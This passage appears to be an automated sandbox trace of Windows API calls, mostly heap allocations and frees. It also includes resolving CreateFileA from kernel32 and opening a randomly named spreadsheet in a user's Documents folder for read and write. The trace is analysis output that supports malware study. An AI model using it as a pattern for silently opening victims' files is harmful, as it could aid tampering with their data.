| out: hHeap=0x8a0000) returned 1 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0169.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0169.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0169.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0169.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0169.171] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0169.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0169.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0169.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0169.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0169.174] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0169.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0169.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0169.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bdb10 [0169.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bdb10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0169.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.175] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0169.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0169.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0169.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0169.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0169.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0169.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bdb10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0169.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.176] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0169.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0169.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0169.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0169.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0169.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0169.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0169.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0169.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0169.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa6b008 [0169.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0169.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41) returned 0x9aa4f8 [0169.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx", cchWideChar=65, lpMultiByteStr=0x9aa4f8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx", lpUsedDefaultChar=0x0) returned 65 [0169.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0169.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0169.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0169.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0169.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0169.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0169.178] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g_g2urcnwkccd17pjnc.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0169.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0169.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0169.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0169.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0169.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0169.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0169.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0169.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x82) returned 0x8feba8 [0169.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=65, lpWideCharStr=0x8feba8, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx") returned 65 [0169.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0169.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0169.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0169.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0169.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0169.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0169.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0169.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0169.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0169.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0169.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0169.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0169.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0169.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0169.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0169.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0169.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0169.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0169.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0169.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0169.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0169.182] FreeLibrary (hLibModule=0x75990000) returned 1 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree 